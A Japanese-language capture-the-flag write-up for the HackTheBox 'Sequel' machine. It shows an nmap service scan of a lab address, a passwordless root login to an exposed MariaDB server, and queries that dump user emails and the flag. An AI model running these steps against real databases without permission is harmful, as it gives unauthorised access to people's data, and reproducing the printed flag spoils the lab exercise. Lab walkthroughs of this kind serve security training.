はじめに
本記事は「HackTheBox:Sequel」のwriteupです。
問題
MySQLに関する問題です。
回答
とりあえず、ポートスキャンします。
結果mysql(tcp/3306)が公開されていることがわかりました。
今回はmysqlのバージョンを見るために-sVだけでなく-sCも付与しています。
┌──(kali㉿kali)-[~]
└─$ nmap -sV -sC 10.129.184.53
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-28 22:35 JST
Nmap scan report for 10.129.184.53
Host is up (0.19s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
3306/tcp open mysql?
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
| Thread ID: 129
| Capabilities flags: 63486
| Some Capabilities: DontAllowDatabaseTableColumn, SupportsLoadDataLocal, ODBCClient, InteractiveClient, Speaks41ProtocolOld, SupportsCompression, LongColumnFlag, IgnoreSigpipes, SupportsTransactions, Support41Auth, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, FoundRows, ConnectWithDatabase, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: 15W8N`wX48Z?jzF/U>w]
|_ Auth Plugin Name: mysql_native_password
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 219.68 seconds
rootユーザはパスワードなしでログインできます。
ログインを試みたところ成功しました。
また、show databases;でデータベースも確認できました。
┌──(kali㉿kali)-[~]
└─$ mysql -u root -h 10.129.184.53
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 137
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| htb |
| information_schema |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.190 sec)
MariaDB [(none)]>
htbデータベースにスイッチし、テーブルを確認しました。
それぞれ中身をselectすると、configテーブルにフラグが含まれていました。
MariaDB [(none)]> use htb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [htb]> show tables;
+---------------+
| Tables_in_htb |
+---------------+
| config |
| users |
+---------------+
2 rows in set (0.188 sec)
MariaDB [htb]> select * from users;
+----+----------+------------------+
| id | username | email |
+----+----------+------------------+
| 1 | admin | admin@sequel.htb |
| 2 | lara | lara@sequel.htb |
| 3 | sam | sam@sequel.htb |
| 4 | mary | mary@sequel.htb |
+----+----------+------------------+
4 rows in set (0.180 sec)
MariaDB [htb]> select * from config;
+----+-----------------------+----------------------------------+
| id | name | value |
+----+-----------------------+----------------------------------+
| 1 | timeout | 60s |
| 2 | security | default |
| 3 | auto_logon | false |
| 4 | max_size | 2M |
| 5 | flag | 7b4bec00d1a39e3dd4e021ec3d915da8 |
| 6 | enable_uploads | false |
| 7 | authentication_method | radius |
+----+-----------------------+----------------------------------+
7 rows in set (0.183 sec)